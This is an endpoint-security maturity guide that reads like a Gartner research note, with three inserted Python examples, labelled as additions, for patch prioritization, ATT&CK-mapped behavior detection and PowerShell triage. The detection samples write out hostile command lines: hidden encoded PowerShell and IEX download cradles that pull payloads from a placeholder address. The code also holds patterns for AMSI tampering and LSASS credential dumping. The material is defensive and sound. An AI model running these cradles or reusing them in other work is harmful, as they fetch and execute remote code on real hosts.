Endpoints are a primary target in common and advanced cyberattacks. 
Security and risk management leaders should use this guide to evaluate the 
quality of their current endpoint protection and identify next steps to improve 
their resilience. 
Key Challenges 


There are no clear guides that outline the steps to take to improve the security posture of 
endpoints in a rapidly changing attack landscape. 


Attacker tradecraft is in a constant cycle: techniques first seen in targeted nation-state tools are 
quickly repackaged into mass-propagated automated attack kits. Advanced attacks are moving to 
fileless attack methods. 


The endpoint protection market is rapidly shifting from protection only to protection plus 
detection and response, but it has still not addressed the configuration and vulnerability 
assessment needed to harden endpoints against future attacks. 


Sound operational practices such as configuration, vulnerability and patch management are the 
hallmarks of a sophisticated endpoint protection program; however, less mature organizations 
lack the resources to improve their processes and need to find ways to compensate now. 


Staffing levels are often an impediment to improving endpoint security. 


Recommendations 


Security and risk management leaders responsible for endpoint security: 


Analyze the current level of endpoint protection and the potential steps needed to improve. 


Consult with business leaders to identify the biggest potential risks to their goals and negotiate 
an achievable level of endpoint protection to strive for, given resources allocated. 


Strive to implement endpoint maintenance processes, and select solutions that offer cloud 
delivery and managed services, if your organization is less mature. 


Invest in improving endpoint security configuration standards and endpoint maintenance 
processes, and shift from protection-only to a detection and response mindset, if your 
organization has reasonably mature endpoint protection. 


Focus on detection and response across the stack, from firmware to authentication, if your 
organization has highly mature endpoint protection. 


Introduction 


Most enterprise leaders recognize the benefits of information security. The need for robust security 
practices that protect business-critical IT systems and data is being constantly reinforced by news 
headlines. But not all organizations face the same level of business risk, and not all organizations 
are starting from the same baseline of endpoint protection. This research examines the 
requirements for endpoint protection from malicious attacks, and provides a list of projects to 
achieve better protection. Figure 1 maps the types of attackers that an organization faces against 
the current or desired levels of endpoint protection. The graph shows roughly when each suggested 
project has the highest impact. 
Figure 1. Endpoint Project Roadmap: Anticipated Adversary 
For example, supply chain inspection does not make sense if an organization doesn't even do 
proper patch management. On the other hand, root cause analysis is a logical next step for 
organizations that have already gained experience in detection and response. Moreover, protection 
for endpoints goes beyond just components that go on endpoints and must include, at a minimum, 
application-level network security products, such as secure web gateways (SWGs) and email 
gateways. 


Analysis 


SRM leaders responsible for endpoint security should consider the risks they most want to prevent, 
the level of adversary they're prepared to defend against and their current situation when selecting 
what to do next to improve endpoint resilience to attacks. 
Not all organizations will, or should, work through every protection project listed above in 
sequence to reach the highest level of endpoint security. The cost of improving the security posture 
of the endpoint must be commensurate with the anticipated risks. Organizations that expect to 
defend against advanced attackers should certainly strive for Level 5 as described in Figure 1. Other 
organizations must weigh the risks against the cost and inform management of the level of security 
that is achievable and the potential risks that may not be addressed, given the resources allocated. 
A second key consideration is that organizations at lower levels of sophistication may have to 
accept the reality that they need to become more secure despite broken processes and a lack of 
fundamentals and staff. Managed security services can provide a fast track to improve operational 
security, allowing more focus on strategic priorities. 


Evaluate the Risks 


When deciding the appropriate target level of endpoint security for their organization and the 
appropriate next-step projects, SRM leaders must consider the risk to the business. What type of 
attacks and attackers is the business prepared to defend against? What level of residual risk are 
they prepared to accept? What type of attack would be the most critical to defend against? And 
how mature is their endpoint security today, before they select next-step projects? 


In the current malware landscape, the most prevalent risks to the business fall into seven categories 
(listed roughly in order of prevalence): 

1. Ransomware, potentially causing substantial business downtime 
2. Financial fraud (including personal banking) 
3. Disclosure of personal and private data of customers and employees, creating regulatory and 
reputation risk 
4. Payment card system attacks, creating regulatory and reputation risk 
5. Disclosure of intellectual property, with the potential to reduce competitive advantage 
6. Relay in attacks on partners or third parties, or CPU theft such as cryptomining [5], wasting 
valuable resources 
7. Business disruption attacks, causing business downtime and the cost of returning to normal 
operations 


Consider the Attacker Landscape 


SRM leaders need to consider the attackers they need to be adequately prepared to encounter. 
Attackers generally come in three varieties: 


1. The automated attacker has a reliable automated attack methodology — typically a 
vulnerability exploit or effective social engineering attack — to infect as many victims as 
possible. These attackers may change tradecraft as mitigations become mainstream, but their 
business model does not include zero-day or manual attack tradecraft. WannaCry was a good 
example of an automated attack. 
2. The opportunistic persistent attacker uses automated attack techniques to find victims, 
typically by scanning their infrastructure for known vulnerabilities, but then uses a wide variety 
of tradecraft to move laterally and exploit the victim. This class of attacker will grow with the 
increased use of automated exploitation tools and will likely expand its targets to popular business 
process software. SamSam ransomware is a good example. 


3. The advanced persistent attacker has a specific goal and will use any method to achieve their 
aim. Advanced attackers will use simple tradecraft if possible, but will escalate to novel attacks 
provided the goal is profitable enough. Nation-state attacks are a good example. 


SRM leaders need to estimate the impact and likelihood of each attack type and attacker profile 
they should be prepared to address, and negotiate with business leaders on an appropriate level of 
security and residual risk. 


When prioritizing endpoint protection projects, SRM leaders must consider the primary attack 
tradecraft. While there is a vast amount of malicious code and techniques, most can be boiled down 
to (1) unconstrained ability to execute file- or script-based code on the host machine, or (2) stealing 
credentials. 


Portable executable (PE) file attacks can be filtered with machine learning (ML) and traditional 
signatures and heuristics. But it is a race against time unless the execution environment is locked 
down with some form of application control or, at a minimum, software attestation that examines 
all unknown code in near real time. Over the next five years, Windows is moving in the direction of 
macOS (Gatekeeper) and the mobile OSs (Android, iOS, Chrome OS), toward file-based execution 
restrictions managed by a corporate app store with an appropriate approval workflow. Over this 
time, endpoint management will merge with mobile device management. 


Even with perfect control over which processes execute, however, there will still be vulnerabilities 
that can be exploited. OS-level mitigations such as Windows 10 Exploit Guard make numerous 
classes of vulnerabilities hard to exploit, but not all. Rapid patching is critical, but in most 
organizations patching is overwhelmingly complex. The art is in managing the vulnerability and 
patch management process. Less mature security organizations should focus on network- and 
endpoint-based vulnerability shielding, and on patching only the most prevalent and exposed 
software (see "It's Time to Align Your Vulnerability Management Priorities With the Biggest 
Threats"). The vast majority of automated attacks, including ransomware, exploit vulnerabilities in 
only a small number of software vendors' products. Indeed, 77% of vulnerabilities have no 
published or observed exploit code [1]. Focusing on the top five will eliminate a large percentage 
of automated malware [2]. More mature security organizations facing more determined 
adversaries must be more diligent in patching, because determined adversaries will use obscure 
vulnerabilities and physical attacks. 
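To make the prioritization argument above concrete, here is an added example (not code from the original note) that ranks a constructed set of vulnerabilities the way the text recommends: evidence of exploitation and membership in the most-targeted product families outweigh raw CVSS. The product tokens, weights and tiers are this example's own assumptions, and the CVE numbers are placeholders, not real advisories.

```python
"""Patch prioritization sketch. Added example, not part of the original note.

Ranks vulnerabilities the way the text argues: flaws with observed or public
exploit code in the most prevalent, most exposed software come first, and
CVSS alone does not drive the queue. The CVE identifiers, products and
attributes below are constructed sample data, not real advisories.
"""
from dataclasses import dataclass

# Product families the text calls the "notorious five"; the lower-case
# tokens used to match them are an assumption of this example.
PREVALENT_PRODUCTS = {"windows", "office", "browser", "adobe", "java"}


@dataclass(frozen=True)
class Vuln:
    cve: str
    product: str             # product family, lower-case
    cvss: float              # base score, 0.0 to 10.0
    exploited_in_wild: bool  # exploitation observed in real attacks
    exploit_public: bool     # working exploit code published
    internet_exposed: bool   # reachable from the internet on at least one host
    hosts: int               # number of endpoints affected


def priority_score(v: Vuln) -> float:
    """Higher is more urgent. Exploit evidence dominates; CVSS breaks ties."""
    score = v.cvss
    if v.exploited_in_wild:
        score += 40
    elif v.exploit_public:
        score += 20
    if v.product in PREVALENT_PRODUCTS:
        score += 15
    if v.internet_exposed:
        score += 10
    score += min(v.hosts, 1000) / 100  # up to +10 for breadth of exposure
    return score


def tier(v: Vuln) -> str:
    """emergency: patch out of cycle; standard: next cycle; deferred: track,
    and shield with network/endpoint controls if that is cheaper than patching."""
    if v.exploited_in_wild or (v.exploit_public and v.product in PREVALENT_PRODUCTS):
        return "emergency"
    if v.exploit_public or v.internet_exposed:
        return "standard"
    return "deferred"


def prioritize(vulns):
    """Return the vulnerabilities ordered most urgent first."""
    return sorted(vulns, key=priority_score, reverse=True)


# Constructed sample data (placeholder CVE numbers, not real identifiers).
SAMPLE = [
    Vuln("CVE-0000-0001", "office", 7.8, True, True, False, 900),
    Vuln("CVE-0000-0002", "linux-kernel", 9.8, False, False, False, 40),
    Vuln("CVE-0000-0003", "browser", 8.8, False, True, False, 1200),
    Vuln("CVE-0000-0004", "vpn-appliance", 9.1, False, True, True, 2),
    Vuln("CVE-0000-0005", "java", 5.3, False, False, False, 300),
]

if __name__ == "__main__":
    for v in prioritize(SAMPLE):
        print(f"{v.cve:14} {v.product:14} cvss={v.cvss:4} "
              f"score={priority_score(v):6.2f} tier={tier(v)}")
```

Run it and the kernel flaw with the highest CVSS score lands last: nobody is exploiting it and it sits on 40 internal hosts, while a moderately scored Office bug that is being exploited in the wild goes to the front. Fed real scanner output, the same two questions (is it exploited, and is it in exposed, prevalent software) do most of the work.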


Right now, the real battleground is script-based attacks (e.g., PowerShell, macros, Windows 
Management Instrumentation [WMI], command lines) and commands hidden in obscure execution 
contexts. These powerful utilities are abused by packaged exploit kits and by advanced adversaries' 
custom code. Organizations planning to thwart opportunistic persistent attackers must ensure that 
their endpoint protection platform protects against script-based attacks. PowerShell has a number 
of features that make it easier to monitor and control, such as transcription, script block logging 
and Constrained Language Mode. Group Policy should also be tuned to control macro execution. 
Organizations expecting to face advanced adversaries should focus on restricting and monitoring 
all script usage, and on entity behavioral detection. 


Firmware may well be the next endpoint battleground for advanced adversaries as script controls 
tighten [3]. Firmware is the low-level software that allows the OS to control specific hardware 
components (for example, optical and disk drives, graphics cards, CPU, BIOS, camera, microphone, 
speakers, battery monitors, NICs, trackpad and mouse). Firmware has low-level kernel and hardware 
access, and a modern PC loads 15 to 20 pieces of firmware into memory on every startup. It is 
rarely patched and often unpatchable. 


Software- and hardware-based supply chain attacks are also trending up [4]. If attackers can get 
code into signed, legitimate applications, then they can evade software execution restrictions and 
signature or machine learning controls. Or, if they can compromise component hardware suppliers, 
they can gain access to millions of devices. 


Each of these protection layers will have a false-negative rate greater than zero: some attacks will 
get past it. Consequently, monitoring higher layers for behavior indicative of an attack is crucial to 
obtain better protection against advanced adversaries. EDR capabilities are a prerequisite for 
behavior-based attack detection. The MITRE ATT&CK framework [6] provides an excellent overview 
of common attacker techniques and should be used to test behavior-based detection. Although 
behavior-based detection is more durable than lower-layer attempts to spot specific malicious code, 
it has a higher false-positive rate and thus needs an experienced operator to determine intent. Less 
sophisticated organizations should seek fully managed offerings or, if they are looking to improve 
internal staff, solutions that provide incident response advice to help staff interpret results and 
respond to alerts. Currently, EPP solutions primarily consider endpoint events in behavioral 
detection, but vendors are increasingly integrating and correlating with network events. 
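As an added illustration of what behavior-based detection tested against ATT&CK looks like in practice (this is example code, not from the original note or from any EPP vendor), the following rules map constructed process telemetry to ATT&CK technique IDs and escalate a host only when it chains several techniques, which is how an operator keeps the false-positive rate the text warns about manageable. The event field names, the lsass allow-list and the threshold are assumptions of the example; the technique IDs are the published ATT&CK ones.

```python
"""Behavior-based detection sketch mapped to MITRE ATT&CK technique IDs.

Added example, not part of the original note. The events are constructed,
Sysmon-style process records; the field names are an assumption of this
example rather than any vendor's schema.
"""
import re
from collections import defaultdict

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Processes that legitimately open handles to lsass.exe; tune per environment.
LSASS_ALLOW = {"csrss.exe", "wininit.exe", "MsMpEng.exe"}


def office_spawns_script_host(e):
    """T1204.002 User Execution: Malicious File (a document spawning a script host)."""
    return (e["type"] == "process_create" and e["parent"] in OFFICE_APPS
            and e["image"] in SCRIPT_HOSTS)


def encoded_powershell(e):
    """T1027 Obfuscated Files or Information: -EncodedCommand and its aliases."""
    return (e["type"] == "process_create" and e["image"] == "powershell.exe"
            and re.search(r"(?i)\s-(e|ec|enc|encodedcommand)\s", e["cmdline"]) is not None)


def download_cradle(e):
    """T1105 Ingress Tool Transfer: PowerShell fetching a payload from the network."""
    return (e["type"] == "process_create" and e["image"] == "powershell.exe"
            and re.search(r"(?i)downloadstring|downloadfile|invoke-webrequest", e["cmdline"]) is not None)


def lsass_access(e):
    """T1003.001 OS Credential Dumping: LSASS Memory."""
    return (e["type"] == "process_access" and e["target"] == "lsass.exe"
            and e["image"] not in LSASS_ALLOW)


def wmi_process_create(e):
    """T1047 Windows Management Instrumentation used to launch a process."""
    return (e["type"] == "process_create" and e["image"] == "wmic.exe"
            and "process call create" in e["cmdline"].lower())


RULES = [
    ("office_spawns_script_host", "T1204.002", office_spawns_script_host),
    ("encoded_powershell", "T1027", encoded_powershell),
    ("download_cradle", "T1105", download_cradle),
    ("lsass_access", "T1003.001", lsass_access),
    ("wmi_process_create", "T1047", wmi_process_create),
]


def match_rules(event):
    """Return [(rule_name, technique_id)] for every rule the event triggers."""
    return [(name, tid) for name, tid, pred in RULES if pred(event)]


def suspicious_hosts(events, min_techniques=2):
    """Escalate a host only when it exhibits several distinct techniques.

    A single hit (an admin launching PowerShell, a backup agent touching
    lsass) is exactly the false positive the text warns about; chaining
    is what separates an intrusion from background noise."""
    techniques = defaultdict(set)
    for e in events:
        for _, tid in match_rules(e):
            techniques[e["host"]].add(tid)
    return {h: sorted(t) for h, t in techniques.items() if len(t) >= min_techniques}


# Constructed sample telemetry (hostnames, paths and the 198.51.100.0/24
# address are documentation placeholders, not real infrastructure).
SAMPLE_EVENTS = [
    {"host": "ws-17", "type": "process_create", "parent": "winword.exe",
     "image": "powershell.exe", "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"host": "ws-17", "type": "process_create", "parent": "powershell.exe",
     "image": "powershell.exe",
     "cmdline": "powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"},
    {"host": "ws-17", "type": "process_access", "image": "rundll32.exe", "target": "lsass.exe"},
    {"host": "ws-04", "type": "process_create", "parent": "explorer.exe",
     "image": "powershell.exe", "cmdline": "powershell.exe -File C:\\scripts\\inventory.ps1"},
    {"host": "srv-db1", "type": "process_access", "image": "MsMpEng.exe", "target": "lsass.exe"},
]

if __name__ == "__main__":
    for host, ids in suspicious_hosts(SAMPLE_EVENTS).items():
        print(f"{host}: escalate, techniques {', '.join(ids)}")
```

Only ws-17 is escalated: a Word document launched an encoded PowerShell command, which pulled a second stage and then read LSASS memory. The scheduled inventory script on ws-04 and the antivirus engine on srv-db1 each trigger nothing, and a host that trips a single rule is left for the analyst queue rather than escalated, which is the operator judgment step the text describes.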


As endpoint OSs move toward the same types of execution restrictions as mobile OSs and arbitrary 
code execution becomes harder, automated and opportunistic attackers will move up the stack to 
the authentication layer, essentially attempting more account takeover attacks through social 
engineering. User and entity behavioral analytics will increasingly be required to detect account 
takeover attacks by spotting abnormal behavior of devices and user accounts. 


Prioritize Projects 


Given these considerations, following are the highest-value projects that SRM leaders responsible 
for endpoint security should undertake to improve endpoint resilience. 


Endpoint Protection, Level 1 


The primary focus at this level should be on beginning to invest in people and process. Begin a 
conversation with the business about the type of threats that are reasonable to expect and the 
corporate resources that are most critical to business goals. Establish an end goal and a timetable, 
and budget to get to the desired level. Initial focus should be on getting an inventory of assets and 
resources. 
Typical projects include: 


1. Inventory endpoints — Ensure that there is an accurate inventory of all devices that connect to 
the network; this includes security controls in place, and patch and configuration levels. 


2. Inventory, upgrade and audit existing EPP, SEG and SWG tools — Many organizations at this 
maturity level run outdated versions of their security products. Begin bringing these tools up to a 
current release (the latest version that has been generally available for at least six months is a 
sensible target), and ask the vendor for assistance in auditing the configuration. 


3. Establish a common gold image for endpoints and begin to reduce configuration drift — Use 
the Microsoft Security Compliance Toolkit [7] on gold images to assess the configuration level. 


4. Complementary EPP — Given that patch, configuration and vulnerability management are likely 
weak at this maturity level, it may be prudent to invest in complementary EPP solutions to obtain 
better protection despite poor process. Most new EPP solutions can run alongside an incumbent 
AV product and are cloud-delivered, making them easy to deploy (see "Redefining Endpoint 
Protection for 2017 and 2018"). 


5. Active outsource — If increasing staff levels and staff skills is unlikely in the near term, consider 
outsourcing security operations and system management to MSSPs (see "Magic Quadrant for 
Managed Security Services, Worldwide"). 


6. Migrate to platform vendors — When selecting new vendors, give more weight to solution 
providers that have multiple solutions with integrated management. 


7. Cloud-first deployment strategy — Favor cloud-deployed solutions to reduce management 
burden and provide faster deployments (see "Top Security and Risk Management Trends"). 


Endpoint Protection, Level 2 


At this stage, the organization should be defining requirements, taking inventory, and developing a 
gap analysis and a plan to close gaps. Focus on getting application- and authentication-level 
inventory. The focus should expand to improve application-level network security and backup and 
restore: 


1. Application inventory and consolidation — Begin to inventory all executable programs, 
determine their provenance and business value, and consolidate applications and versions. Begin 
to establish a new application approval process. 


2. Improve patch management — In this stage, the biggest process benefit is improving patch 
management processes (see "Toolkit: IT Patching Policy"). However, it is important to not get 
too stressed out at this stage by the universe of vulnerabilities. The vast majority of 
opportunistic attacks go after the most common software. So patching the "notorious five" 
(Windows, Office, browsers, Adobe and Java) is the first priority (see "It's Time to Align Your 
Vulnerability Management Priorities With the Biggest Threats"). 
3. Phishing protection — Invest in advanced phishing protection. Most anti-spam solutions do not 
provide antiphishing capabilities alongside their anti-spam protection. Upgrade to cloud-delivered 
secure email gateways (SEGs) to reduce management burden (see "Fighting Phishing: Optimize 
Your Defense"). 


4. Add cloud SWG — On-premises SWGs should be replaced or augmented with cloud-delivered 
SWG protection to expand protection to roaming workers and small offices (see "Using Secure 
Web Gateway Technologies to Protect Users and Endpoints"). 


5. Windows 10 (Credential Guard) and exploit prevention — Update the Windows OS to Windows 10 
with Credential Guard and Exploit Guard enabled (see "Windows 10 Enhances Security"). 


6. Backup/restore — Ransomware is the biggest threat to most organizations and destructive 
attacks are on the rise, so a solid endpoint backup strategy is critical (see "Five Key Actions for 
Midsize Enterprises to Improve Storage and Backup"). 


Endpoint Protection, Level 3 


In Level 3, organizations should have most of the requisite tools, but should be improving process 
and establishing a formal security operations center for incident response. Reporting and tracking of 
performance is beginning to be addressed at this level. Focus expands from malware prevention to 
detection and response to catch more opportunistic attacks. Root cause analysis and proactive 
hardening of endpoints begins: 


1. Security operations center — Begin to establish and staff or outsource a security operations 
center. At this stage, integration with a network operations center is likely desirable. Establish 
roles and responsibilities and begin to work on incident response handling guidelines (see 
"Setting Up a Security Operations Center [SOC]"). 


2. Endpoint detection and response — Implement an EDR solution as a primary tool for incident 
response (see "Market Guide for Endpoint Detection and Response Solutions"). 


3. Sandbox (automatic and on demand) — Consider implementing a network-level sandboxing 
service to filter inbound binaries before they get to the endpoint. 


4. Security awareness training — Begin security awareness training programs, particularly around 
account takeover attacks, web and email security best practices, and how to report suspicious 
incidents to the SOC (see "Three Critical Factors in Building a Comprehensive Security 
Awareness Program"). 


5. Improve vulnerability and patch management — Expand vulnerability and patch management 
programs to non-Windows devices and expand to include the universe of applications. 
Configuration management should also begin to establish baseline configurations for non- 
Windows endpoints (see "A Guidance Framework for Developing and Implementing 
Vulnerability Management"). 


6. Privileged access management — Begin to remove admin rights from users. If necessary, 
implement privileged access management for end users (see "Best Practices for Privileged 
Access Management"). 


Page 8 of 12 Gartner, Inc. | G00343353 


7. Privileged credential life cycle management — Develop an inventory and establish a process for 
privileged credential life cycle management, and monitor usage (see "Best Practices to Protect 
Windows Administrator Credentials"). 


8. Multifactor authentication — Implement multifactor authentication for privileged accounts and 
critical business systems (See "Market Guide for User Authentication"). 


9. BYOD program — Start to review usage of employee-owned laptops and critical business 
systems. Leverage multifactor authentication to protect corporate applications. Consider 
supporting employees with corporate-issued endpoint protection solutions, and use network 
access control to enforce usage (see "How to Successfully Navigate the Hurdles of Global- 
Scale BYOD Implementations"). 


10. Cloud workload protection — Build a center of excellence around server workloads apart from 
end-user-focused endpoints (see "Endpoint and Server Security: Common Goals, Divergent 
Solutions"). Protect cloud and on-premises server workloads with products and strategies 
designed specifically for these workloads (see "How to Develop Infrastructure-as-a-Service 
Security Skills"). 


11. Enterprise mobility management — Implement an EMM solution to manage mobile devices and 
build standard policy templates enforced by EMM (see "Top 10 Best Practices for EMM 
Deployment Success"). 


Endpoint Protection, Level 4 


At Level 4, focus expands to all network-connected devices, with the adoption of techniques to 
reduce the attack surface of the Internet of Things (IoT) and out-of-support OSs. Detection activity 
moves up to the device and user behavioral level. Ramp up the use of default-deny controls, such as 
application whitelisting, network segmentation and web isolation, to reduce the attack surface (see 
"Beyond Detection: 5 Core Security Patterns to Prevent Highly Evasive Threats"). Adopt a 
continuous penetration testing mentality. Consider advanced tools such as deception and mobile 
threat defense: 


1. IoT/OT protection program — Begin to develop strategies and mitigations to protect 
nonstandard devices on the network. All network-attached devices should be in the inventory 
(see "Five Disturbing Trends in IoT Security for 2018, and What You Can Do About Them"). 


2. Red team/blue team exercises — Move from one-time penetration testing to active detection 
and response exercises. The primary goal at this stage should be to test detection and 
response rather than to find specific points of vulnerability to close (see "Using Penetration 
Testing and Red Teams to Assess and Improve Security"). 


3. Threat hunting — Begin threat hunting exercises to detect potential unknown threats (see "How 
to Hunt for Security Threats"). 


4. Application control — Deploy application control for all unpatchable systems and internet- 
facing servers. Consider application control for critical business users or devices (e.g., POS; see 
"How to Successfully Deploy Application Control"). 
5. Script control — Restrict and monitor script usage. PowerShell has a number of features that 
make it easier to monitor and control, such as transcription and Constrained Language Mode. 
Group Policy should also be tuned to control macro execution. 


6. Isolation — Consider implementing network isolation solutions for web surfing and email 
document disarm for critical users or devices (see "Innovation Insight for Remote Browser 
Isolation"). 


7. Microsegmentation — Use network-level microsegmentation to isolate unpatchable servers and 
critical business servers. Protect them with a virtual patching tool (typically an intrusion 
prevention or host-based filter that blocks exploit traffic for a known vulnerability), so that the 
systems are shielded from attack even though the underlying software remains unpatched (see 
"Technology Insight for Microsegmentation"). 


8. Deception — Consider implementing deception tools to detect active attackers (see 
"Competitive Landscape: Distributed Deception Platforms, 2016"). 


9. Mobile threat defense — Implement mobile threat defense on mobile endpoints used by 
privileged users and high-value-target employees (see "Market Guide for Mobile Threat Defense 
Solutions"). 
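Item 5 above, like the script-based-attack discussion in the Analysis section, recommends restricting and monitoring PowerShell. The following added example (not code from the original note) shows the monitoring side: it decodes the Base64/UTF-16LE payload behind -EncodedCommand and scores the launcher plus the decoded script for obfuscation and for probing of Constrained Language Mode or AMSI. The indicator patterns, severity rules and sample command lines are this example's own, not a vendor ruleset; with script block logging enabled, the decoded text arrives in the event log directly and the same scoring applies.

```python
"""Script-block triage for PowerShell launches. Added example, not part of the
original note.

Decodes a -EncodedCommand payload (Base64 of UTF-16LE) and scores the launcher
plus decoded body for obfuscation and for probing of the controls the text
recommends (Constrained Language Mode, AMSI). The sample command lines are
constructed; the indicator list is this example's own, not a vendor ruleset.
"""
import base64
import re

# -e, -ec, -enc and -EncodedCommand are all accepted by powershell.exe.
ENCODED_RE = re.compile(r"(?i)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})")

INDICATORS = {
    "amsi_tamper": re.compile(r"(?i)amsi(utils|initfailed|scanbuffer)"),
    "clm_probe": re.compile(r"(?i)languagemode|__PSLockdownPolicy"),
    "download_cradle": re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|net\.webclient"),
    "reflective_load": re.compile(r"(?i)\[reflection\.assembly\]::load|system\.reflection"),
    "char_obfuscation": re.compile(r"(?i)\[char\]\s*\d+|-join|frombase64string"),
    "hidden_window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden|-nop\b"),
}


def decode_encoded_command(cmdline: str):
    """Return the decoded script if the launcher used -EncodedCommand, else None."""
    m = ENCODED_RE.search(cmdline)
    if m is None:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # malformed payload; the launcher is still flagged as encoded


def triage(cmdline: str) -> dict:
    """Score one process-creation command line; returns decoded text, hits, severity."""
    encoded = ENCODED_RE.search(cmdline) is not None
    decoded = decode_encoded_command(cmdline)
    # Inspect the launcher and, when present, the decoded body. Script block
    # logging (event 4104) would give you this text without decoding.
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    if encoded:
        hits.insert(0, "encoded_command")
    if text.count("`") >= 5:  # backtick splitting such as i`e`x
        hits.append("backtick_obfuscation")
    if "amsi_tamper" in hits or "clm_probe" in hits or (encoded and "download_cradle" in hits):
        severity = "high"
    elif hits:
        severity = "medium"
    else:
        severity = "low"
    return {"decoded": decoded, "indicators": hits, "severity": severity}


def _encode(script: str) -> str:
    """Build the Base64(UTF-16LE) form PowerShell expects, to construct the sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed samples; 198.51.100.0/24 is a documentation address range.
DECODED_SCRIPT = ("$ExecutionContext.SessionState.LanguageMode; "
                  "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/s')")
MALICIOUS = "powershell.exe -nop -w hidden -enc " + _encode(DECODED_SCRIPT)
OBFUSCATED = ("powershell.exe -c \"i`e`x`(`n`e`w-object net.webclient)"
              ".downloadstring('http://198.51.100.7/b')\"")
BENIGN = "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1"

if __name__ == "__main__":
    for sample in (MALICIOUS, OBFUSCATED, BENIGN):
        r = triage(sample)
        print(f"{r['severity']:6} {r['indicators']}")
```

The encoded launcher scores high because the decoded body checks the session's language mode (something a legitimate script rarely needs to do) and then pulls a second stage; the backtick-split cradle scores medium; the signed inventory script scores low even though it passes -ExecutionPolicy Bypass. As the text says, these are triage signals for an experienced operator, not verdicts: an administrator's troubleshooting script can legitimately inspect LanguageMode, so the high tier routes to a person rather than to an automatic block.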


Endpoint Protection, Level 5 


This is the refinement stage. Activity expands to inspecting the supply chain for attacks introduced 
through suppliers, and to attacks lower in the computing stack, such as firmware attacks: 


1. Supply chain — Focus on equipment manufacture and application supply chain. Consider 
geopolitical component risk (see "Top Security and Risk Management Trends"). 


2. Firmware — Begin to inventory, monitor and patch firmware and microcontrollers. 


3. Continuous threat hunting — Skilled and experienced SOC analysts use event data from 
endpoints, network devices and application logs to identify suspicious or malicious activity that 
has bypassed automated controls. Once discovered, the new IoAs/IoCs are added to the 
prevention layer, forming a closed-loop prevention, detection and response practice (see "How 
to Hunt for Security Threats"). 


4. Orchestration and automation — Begin to automate repetitive security tasks (See "Preparing 
Your Security Operations for Orchestration and Automation Tools"). 


Gartner Recommended Reading 


Some documents may not be available as part of your current Gartner subscription. 
"ITScore for Information Security" 
"Top Security and Risk Management Trends" 


"Top Tips for Communicating Security and Risk to Business Stakeholders" 
"Develop Existing Security Staff to Excel in the Digital Era" 


"Magic Quadrant for Endpoint Protection Platforms" 


Evidence 


1 "Prioritization to Prediction: Analyzing Vulnerability Remediation Strategies," research report 
from Kenna Security. 

2 "Top 30 Targeted High Risk Vulnerabilities," United States Computer Emergency Readiness Team 
(US-CERT). 

3 "Malware Found in the Firmware of 141 Low-Cost Android Devices," Bleeping Computer. 

4 Recent examples of supply chain attacks: the Ukrainian software MeDoc was used to infect 
computers with NotPetya; CCleaner; and Absolute Software. 

5 "Thousands of Seagate NAS Boxes Host Cryptocurrency Mining Malware," InfoWorld. 

6 MITRE ATT&CK framework, wiki. 

7 The Microsoft Security Compliance Toolkit "allows enterprise security administrators to download, 
analyze, test, edit and store Microsoft-recommended security configuration baselines for Windows 
and other Microsoft products, while comparing them against other security configurations." 